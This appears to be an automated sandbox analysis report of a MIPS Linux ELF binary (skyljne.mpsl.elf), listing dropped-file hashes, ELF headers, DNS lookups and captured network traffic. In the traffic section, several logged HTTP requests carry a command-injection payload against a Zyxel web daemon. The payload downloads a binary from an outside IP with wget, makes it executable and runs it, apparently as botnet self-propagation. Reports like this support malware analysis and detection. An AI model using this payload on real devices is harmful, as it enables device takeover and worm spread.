                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      Process:/tmp/skyljne.mpsl.elf
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):22
                                      Entropy (8bit):3.6978458230844122
                                      Encrypted:false
                                      SSDEEP:3:TgJIcFA3:Tgb63
                                      MD5:70186E534C1C60301C402735A3D271DE
                                      SHA1:375121169DBB1FF72EBA203B5E1B019292E0D097
                                      SHA-256:34F6F9366167A1DAD0B09CA0C822153804688245441E982C4D48228F472275C9
                                      SHA-512:2A68E7D7CD4EC0B2A6063AFDD21801558DF4001A0686F8A0D81B0E4EBF20BFBDE00183C59EFD34B3D28A03A1BF39506581FEC392DA8623B0118BD269E34F5CB8
                                      Malicious:false
                                      Preview:/tmp/skyljne.mpsl.elf.
                                      File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                      Entropy (8bit):5.141770316738254
                                      TrID:
                                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                      File name:skyljne.mpsl.elf
                                      File size:194'348 bytes
                                      MD5:fe4a2343ddb8e76551e46449ca85568a
                                      SHA1:a82c92e1239ab1abd0bfd1e525546c8672f2a6a3
                                      SHA256:a5a6a44fed3bad2aa586b947fe40ef9907ae1dbf83837a71cf97527b4bed55ae
                                      SHA512:7ebee4615afa5a2560cddbfd37c868602901f2ff2f1d62a79a49a15eabbdf179607a68b60cd470e4df33f3e0edb147f97a65cafd2bf55ed8c69b34a7da20ea37
                                      SSDEEP:3072:Nkj3SlGiQjefiI2UIkgYpsWySZflMjBuwH3N0:emlHiIxgYps7SZ9s99
                                      TLSH:D814D816AB610FBBDCAFDD3706E90B1239CC944722A83B353674D928F54A54B49E3C78
                                      File Content Preview:.ELF....................`.@.4...........4. ...(...............@...@.p...p.....................F...F..T..x...........Q.td...............................<.i.'!......'.......................<.i.'!... .........9'.. ........................<.i.'!...$........o9

                                      ELF header

                                      Class:ELF32
                                      Data:2's complement, little endian
                                      Version:1 (current)
                                      Machine:MIPS R3000
                                      Version Number:0x1
                                      Type:EXEC (Executable file)
                                      OS/ABI:UNIX - System V
                                      ABI Version:0
                                      Entry Point Address:0x400260
                                      Flags:0x1007
                                      ELF Header Size:52
                                      Program Header Offset:52
                                      Program Header Size:32
                                      Number of Program Headers:3
                                      Section Header Offset:193788
                                      Section Header Size:40
                                      Number of Section Headers:14
                                      Header String Table Index:13
                                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                      NULL0x00x00x00x00x0000
                                      .initPROGBITS0x4000940x940x8c0x00x6AX004
                                      .textPROGBITS0x4001200x1200x26ee00x00x6AX0016
                                      .finiPROGBITS0x4270000x270000x5c0x00x6AX004
                                      .rodataPROGBITS0x4270600x270600x2f100x00x2A0016
                                      .ctorsPROGBITS0x46a0000x2a0000xc0x00x3WA004
                                      .dtorsPROGBITS0x46a00c0x2a00c0x80x00x3WA004
                                      .data.rel.roPROGBITS0x46a0180x2a0180xe80x00x3WA004
                                      .dataPROGBITS0x46a1000x2a1000x49980x00x3WA0032
                                      .gotPROGBITS0x46eaa00x2eaa00x9f80x40x10000003WAp0016
                                      .sbssNOBITS0x46f4980x2f4980x500x00x10000003WAp004
                                      .bssNOBITS0x46f4f00x2f4980x47880x00x3WA0016
                                      .mdebug.abi32PROGBITS0x12b40x2f4980x00x00x0001
                                      .shstrtabSTRTAB0x00x2f4980x640x00x0001
                                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                      LOAD0x00x4000000x4000000x29f700x29f705.48740x5R E0x10000.init .text .fini .rodata
                                      LOAD0x2a0000x46a0000x46a0000x54980x9c781.19850x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jan 14, 2024 15:50:06.735209942 CET192.168.2.148.8.8.80xeae8Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jan 14, 2024 15:50:06.851351023 CET8.8.8.8192.168.2.140xeae8No error (0)haha.skyljne.click103.245.236.152A (IP address)IN (0x0001)false
                                      Session IDSource IPSource PortDestination IPDestination Port
                                      0192.168.2.144522825.5.71.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.764415026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1192.168.2.14374761.195.222.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.764600992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2192.168.2.1440264198.247.197.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.764667988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3192.168.2.145253497.79.107.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.764705896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4192.168.2.1456762183.129.157.55443
                                      TimestampBytes transferredDirectionData
